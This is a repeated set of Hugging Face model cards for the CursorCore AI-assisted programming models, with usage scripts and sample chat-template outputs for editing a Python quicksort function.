This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-Yi-1.5B-LC-AWQ | TechxGenus | 2024-10-10T06:39:55Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-Yi-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-Yi-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T14:22:03Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-Yi-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-Yi-1.5B-GPTQ | TechxGenus | 2024-10-10T06:39:32Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-Yi-1.5B",
"base_model:quantized:TechxGenus/CursorCore-Yi-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:59:59Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-Yi-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-DS-6.7B | TechxGenus | 2024-10-10T06:38:41Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:deepseek-ai/deepseek-coder-6.7b-base",
"base_model:finetune:deepseek-ai/deepseek-coder-6.7b-base",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T11:15:35Z | ---
tags:
- code
base_model:
- deepseek-ai/deepseek-coder-6.7b-base
library_name: transformers
pipeline_tag: text-generation
license: other
license_name: deepseek
license_link: LICENSE
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
